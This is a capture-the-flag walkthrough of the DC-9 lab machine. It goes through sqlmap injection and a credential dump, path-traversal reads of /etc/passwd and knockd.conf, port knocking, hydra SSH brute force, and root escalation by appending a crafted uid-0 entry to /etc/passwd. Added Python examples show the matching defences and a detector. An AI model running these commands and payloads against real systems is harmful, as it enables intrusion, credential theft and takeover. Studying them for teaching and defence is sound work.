1. Scan to obtain the IP address of the target machine
arp-scan -l
192.168.203.148
2. Obtain website information
1. nmap
nmap -sV -A 192.168.203.148
Ports 22 and 80 are open
2. Wappalyzer
Access the home page
Web server: Apache 2.4.38
3. dirb
dirb http://192.168.203.148
Nothing useful was found.
3. Analyze the website
Display lists all user information.
Search lets you look up a user by entering a first or last name.
Manage is the login form (username and password). We first suspected SQL injection there, but none was detected; in the end the injection turned out to be in Search.
4. Burp Suite
Intercepting the request shows that the search field is sent as a POST parameter.
5. sqlmap
Save the captured request to 1.txt and point sqlmap at it.
Enumerate the databases:
sqlmap -r /root/1.txt -p search --dbs
Enumerate the tables:
sqlmap -r /root/1.txt -p search -D users --tables
Enumerate the columns:
sqlmap -r /root/1.txt -p search -D users -T UserDetails --columns
Dump the fields:
sqlmap -r /root/1.txt -p search -D users -T UserDetails -C firstname,lastname,username,password --dump
+-----------+------------+-----------+---------------+
| firstname | lastname   | username  | password      |
+-----------+------------+-----------+---------------+
| Mary      | Moe        | marym     | 3kfs86sfd     |
| Julie     | Dooley     | julied    | 468sfdfsd2    |
| Fred      | Flintstone | fredf     | 4sfd87sfd1    |
| Barney    | Rubble     | barneyr   | RocksOff      |
| Tom       | Cat        | tomc      | TC&TheBoyz    |
| Jerry     | Mouse      | jerrym    | B8m#48sd      |
| Wilma     | Flintstone | wilmaf    | Pebbles       |
| Betty     | Rubble     | bettyr    | BamBam01      |
| Chandler  | Bing       | chandlerb | UrAG0D!       |
| Joey      | Tribbiani  | joeyt     | Passw0rd      |
| Rachel    | Green      | rachelg   | yN72#dsd      |
| Ross      | Geller     | rossg     | ILoveRachel   |
| Monica    | Geller     | monicag   | 3248dsds7s    |
| Phoebe    | Buffay     | phoebeb   | smellycats    |
| Scooter   | McScoots   | scoots    | YR3BVxxxw87   |
| Donald    | Trump      | janitor   | Ilovepeepee   |
| Scott     | Morrison   | janitor2  | Hawaii-Five-0 |
+-----------+------------+-----------+---------------+
None of these accounts can log in to the web application, and SSH is filtered as well, so we move on to the other database (Staff):
sqlmap -r /root/1.txt -p search -D Staff --tables
sqlmap -r /root/1.txt -p search -D Staff -T Users --columns
sqlmap -r /root/1.txt -p search -D Staff -T Users --dump
+--------+--------------------------------------------------+----------+
| UserID | Password                                         | Username |
+--------+--------------------------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin    |
+--------+--------------------------------------------------+----------+
Credentials: admin / transorbital1
Login succeeds.
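The root cause of the step above is a search query assembled by string concatenation. The following is an added example (not code from the DC-9 machine or from this write-up) that rebuilds a miniature UserDetails table in an in-memory SQLite database, with constructed rows modelled on the dump above, and shows the concatenated query next to a parameterized one on the same inputs:

```python
import sqlite3

# Constructed sample rows, modelled on the UserDetails dump above (three rows
# are enough to show the effect).
SAMPLE_ROWS = [
    ("Mary", "Moe", "marym"),
    ("Fred", "Flintstone", "fredf"),
    ("Chandler", "Bing", "chandlerb"),
]

# The textbook tautology input, used here only to show that the two queries
# behave differently on the same string.
TAUTOLOGY = "' OR '1'='1"


def make_db():
    """Build an in-memory stand-in for the users database (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE UserDetails (firstname TEXT, lastname TEXT, username TEXT)"
    )
    conn.executemany("INSERT INTO UserDetails VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn, term):
    """The pattern sqlmap found: user input pasted straight into the SQL text."""
    sql = (
        "SELECT firstname, lastname, username FROM UserDetails "
        f"WHERE firstname = '{term}' OR lastname = '{term}'"
    )
    return conn.execute(sql).fetchall()


def search_hardened(conn, term):
    """Same search with placeholders: the value travels separately from the
    statement, so it can never change the statement's structure."""
    sql = (
        "SELECT firstname, lastname, username FROM UserDetails "
        "WHERE firstname = ? OR lastname = ?"
    )
    return conn.execute(sql, (term, term)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("normal term, vulnerable:", search_vulnerable(db, "Fred"))
    print("normal term, hardened: ", search_hardened(db, "Fred"))
    print("tautology, vulnerable: ", search_vulnerable(db, TAUTOLOGY))
    print("tautology, hardened:   ", search_hardened(db, TAUTOLOGY))
```

For an ordinary name both functions return the same single row. For the tautology string, search_vulnerable returns every row because the quote closes the string literal and the remainder is parsed as SQL, while search_hardened treats the whole input as data and matches nothing. The dumps on the page also show passwords stored in clear text and as unsalted MD5; a salted, slow password hash would have limited the damage of the dump even after the injection.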
After logging in, the message "File does not exist" appears at the bottom of the page, which strongly suggests LFI (local file inclusion).
wfuzz -p 127.0.0.1:8080:HTTP   # -p: route the requests through a proxy
Dictionary address: https://github.com/danielmiessler/SecLists
We use the burp-parameter-names.txt wordlist from it.
Use Burp to fuzz the parameter name:
http://192.168.203.148/manage.php?a=../../../../etc/passwd
This reveals that the parameter name is file.
View the Linux task-scheduling information via ../../../../../../proc/sched_debug:
http://192.168.203.148/manage.php?file=../../../../../../proc/sched_debug
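The file parameter above is joined to an include path without any check, so ../ sequences walk out of the web root. The following is an added example, not the DC-9 application's code, showing that behaviour next to a hardened resolver that maps a page name to a file through a fixed allowlist; the web root /srv/webroot and the page names are constructed for the example:

```python
import os

# Constructed allowlist: the only pages the include logic should ever load.
ALLOWED_PAGES = {
    "home": "home.php",
    "display": "display.php",
    "search": "search.php",
}


def resolve_include_vulnerable(base_dir, requested):
    """Mirror the page's behaviour: the parameter is used as a path as-is."""
    return os.path.normpath(os.path.join(base_dir, requested))


def resolve_include_hardened(base_dir, requested):
    """Look the requested name up in a fixed map instead of trusting it as a
    path. Returns the resolved file, or None if the request is not allowed."""
    filename = ALLOWED_PAGES.get(requested)
    if filename is None:
        return None
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, filename))
    # Defence in depth: even a mapped entry must resolve inside the web root
    # (guards against a mistaken or symlinked allowlist entry).
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    base = "/srv/webroot"  # constructed web root
    for req in ("home", "../../../../etc/passwd", "../etc/knockd.conf"):
        print(f"{req!r:32} vulnerable -> {resolve_include_vulnerable(base, req)}")
        print(f"{'':32} hardened   -> {resolve_include_hardened(base, req)}")
```

With the allowlist in place, a traversal string is simply an unknown page name and yields None; only the three mapped names ever reach the filesystem. A web server whose PHP code follows this pattern would also have prevented the knockd.conf read in the next section.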
4. Connection
This shows that the system runs the knockd service.
Read the knockd configuration file:
http://192.168.203.148/manage.php?file=../../../../../etc/knockd.conf
Method 1, using nc: knock on ports 7469, 8475 and 9842 in turn to perform the port-knocking sequence:
nc 192.168.203.148 7469
nc 192.168.203.148 8475
nc 192.168.203.148 9842
Method 2 uses nmap:
nmap -p 7469 192.168.203.148
nmap -p 8475 192.168.203.148
nmap -p 9842 192.168.203.148
Use hydra to find which users can log in over SSH, with the usernames saved in user.txt and the passwords in pwd.txt:
Note: the wordlists must not contain stray spaces.
hydra -L user.txt -P pwd.txt 192.168.203.148 ssh
login: chandlerb   password: UrAG0D!
login: joeyt   password: Passw0rd
login: janitor   password: Ilovepeepee
SSH connection:
ssh janitor@192.168.203.148
Log in with one of the cracked users and run ls -la (it also lists hidden files). In janitor's home directory there is a hidden directory secrets-for-putin containing passwords-found-on-post-it-notes.txt, which holds the following passwords:
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
Add these passwords to the password file and run hydra again:
hydra -L user.txt -P pwd.txt 192.168.203.148 ssh
This cracks a new user:
login: fredf   password: B4-Tru3-001
SSH connection:
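Both hydra runs above leave a dense burst of failed SSH logins for many different usernames from one source in the target's auth.log, followed by an accepted login. The following is an added example (not part of the write-up) of detection logic for that pattern, run over a constructed auth.log excerpt; the hostname dc9, the source addresses and the timestamps are made up for the example:

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt shaped like what a hydra run leaves behind:
# many failures for different users from one source, then a success.
SAMPLE_AUTH_LOG = """\
Apr 12 10:01:01 dc9 sshd[1201]: Failed password for marym from 192.168.203.1 port 40001 ssh2
Apr 12 10:01:01 dc9 sshd[1202]: Failed password for julied from 192.168.203.1 port 40002 ssh2
Apr 12 10:01:02 dc9 sshd[1203]: Failed password for invalid user scoots from 192.168.203.1 port 40003 ssh2
Apr 12 10:01:02 dc9 sshd[1204]: Failed password for fredf from 192.168.203.1 port 40004 ssh2
Apr 12 10:01:03 dc9 sshd[1205]: Failed password for barneyr from 192.168.203.1 port 40005 ssh2
Apr 12 10:01:03 dc9 sshd[1206]: Accepted password for chandlerb from 192.168.203.1 port 40006 ssh2
Apr 12 10:05:00 dc9 sshd[1300]: Failed password for alice from 10.0.0.7 port 51000 ssh2
Apr 12 10:05:30 dc9 sshd[1301]: Accepted password for alice from 10.0.0.7 port 51001 ssh2
"""

TS = r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
FAILED_RE = re.compile(TS + r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPT_RE = re.compile(TS + r"Accepted password for (\S+) from (\S+) port \d+")


def parse_ts(text, year=2024):
    """Syslog timestamps carry no year; assume one (constructed) so they compare."""
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def find_brute_force(log_text, threshold=5, window_seconds=60):
    """Flag sources with `threshold` failed logins inside `window_seconds`.

    Returns {source_ip: {"failures", "distinct_users", "accepted_after_spray"}}.
    A success from a flagged source after its first failure is the highest-
    priority signal: the spray worked.
    """
    events = defaultdict(list)  # source ip -> [(timestamp, kind, user)]
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            events[m.group(3)].append((parse_ts(m.group(1)), "fail", m.group(2)))
            continue
        m = ACCEPT_RE.match(line)
        if m:
            events[m.group(3)].append((parse_ts(m.group(1)), "ok", m.group(2)))

    findings = {}
    for ip, evs in events.items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if e[1] == "fail"]
        # Sliding window over the sorted failures.
        triggered = any(
            (fails[i + threshold - 1][0] - fails[i][0]).total_seconds() <= window_seconds
            for i in range(len(fails) - threshold + 1)
        )
        if not triggered:
            continue
        first_fail = fails[0][0]
        accepted = sorted({e[2] for e in evs if e[1] == "ok" and e[0] >= first_fail})
        findings[ip] = {
            "failures": len(fails),
            "distinct_users": len({e[2] for e in fails}),
            "accepted_after_spray": accepted,
        }
    return findings


if __name__ == "__main__":
    for ip, info in find_brute_force(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

Run against the sample, only 192.168.203.1 is flagged: five failures across five usernames within two seconds, then an accepted login for chandlerb, which matches the first hydra result on this page. The single failure from 10.0.0.7 is ordinary user error and stays below the threshold. The year is an assumption because syslog omits it; feed the detector lines from one year at a time or use journald's full timestamps.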
5. Privilege escalation
ssh fredf@192.168.203.148
sudo -l
fredf can execute a file as root with NOPASSWD.
Running it prints a usage hint: python test.py plus arguments.
Enter the /opt/devstuff directory and see the test.py file
Meaning: it takes three arguments and appends the contents of the file given as the second argument to the file given as the third; the test binary in that directory can be executed with root privileges.
Idea: Construct an account with root privileges and put it in /etc/passwd, log in with the constructed account, and you will have root privileges
Generate with openssl:
openssl passwd -1 -salt js 233333
$1$js$8LV1DbndSIfP29vG.eYaj1
Write it to a file in the /tmp directory:
echo 'js:$1$js$8LV1DbndSIfP29vG.eYaj1:0:0::/root:/bin/bash' > /tmp/js
Run test:
cd /opt/devstuff/dist/test
sudo ./test /tmp/js /etc/passwd
Logging in as the new js account succeeds with root privileges; read the flag.
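The escalation works because a tool that appends one arbitrary file to another runs as root with no restriction on the destination. The following is an added example, not the test.py from the machine, of how such a helper can confine both paths to one working directory and refuse anything that resolves outside it; the directory layout is constructed inside a temporary directory so the demo runs anywhere:

```python
import os
import tempfile


def safe_append(src, dst, allowed_dir):
    """Append src to dst, but only if both resolve inside allowed_dir.

    realpath() follows symlinks first, so a link planted inside allowed_dir
    that points at /etc/passwd is rejected too. Returns bytes appended.
    """
    root = os.path.realpath(allowed_dir)
    real_src = os.path.realpath(src)
    real_dst = os.path.realpath(dst)
    for path in (real_src, real_dst):
        if os.path.commonpath([root, path]) != root:
            raise PermissionError(f"{path} is outside {root}")
    with open(real_src, "rb") as fin:
        data = fin.read()
    with open(real_dst, "ab") as fout:
        fout.write(data)
    return len(data)


def demo():
    """Constructed scenario: one append inside the allowed directory, and one
    attempt against a stand-in for /etc/passwd that lives outside it."""
    with tempfile.TemporaryDirectory() as work:
        allowed = os.path.join(work, "devstuff-data")
        os.mkdir(allowed)
        src = os.path.join(allowed, "input.txt")
        dst = os.path.join(allowed, "output.txt")
        outside = os.path.join(work, "passwd")  # stand-in for /etc/passwd
        with open(src, "w") as f:
            f.write("hello\n")
        with open(dst, "w") as f:
            f.write("start\n")
        with open(outside, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")

        appended = safe_append(src, dst, allowed)
        try:
            safe_append(src, outside, allowed)
            blocked = False
        except PermissionError:
            blocked = True

        with open(dst) as f:
            result = f.read()
        with open(outside) as f:
            untouched = f.read()
        return appended, result, blocked, untouched


if __name__ == "__main__":
    print(demo())
```

The allowed append succeeds and returns 6 bytes; the append aimed outside the directory raises PermissionError and the stand-in passwd file is unchanged. Confinement is the second line of defence: the first is not granting NOPASSWD sudo to a program that takes user-supplied paths at all, and keeping /etc/passwd and /etc/shadow out of reach of anything that is not a dedicated account-management tool.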